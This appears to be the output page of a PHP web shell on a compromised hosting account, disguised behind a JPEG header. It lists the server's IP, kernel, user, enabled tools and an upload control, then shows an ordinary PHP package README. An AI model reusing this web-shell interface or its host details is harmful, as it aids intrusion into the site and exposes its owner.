����JFIF��x�x����'
Server IP : 66.29.137.217 / Your IP : 3.134.105.118 Web Server : LiteSpeed System : Linux premium294.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : gltevjme ( 1095) PHP Version : 7.0.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/gltevjme/bofirmacademy.com/vendor/php-http/message-factory/ |
Upload File : |
# PSR-7 Message Factory [](https://github.com/php-http/message-factory/releases) [](LICENSE) [](https://packagist.org/packages/php-http/message-factory) **Factory interfaces for PSR-7 HTTP Message.** ## Obsolete The PHP-HTTP factories have become obsolete with the [PSR-17](https://www.php-fig.org/psr/psr-17/) factories standard. All major HTTP client implementors provide [PSR-17 factories](https://packagist.org/packages/psr/http-factory). This package will remain available for the time being to not break legacy code, but we encourage everybody to move to PSR-17. ## Install Via Composer ``` bash $ composer require php-http/message-factory ``` ## Documentation Please see the [official documentation](http://docs.php-http.org/en/latest/message/message-factory.html). ## Contributing Please see our [contributing guide](http://docs.php-http.org/en/latest/development/contributing.html). ## Security If you discover any security related issues, please contact us at [security@php-http.org](mailto:security@php-http.org). ## License The MIT License (MIT). Please see [License File](LICENSE) for more information.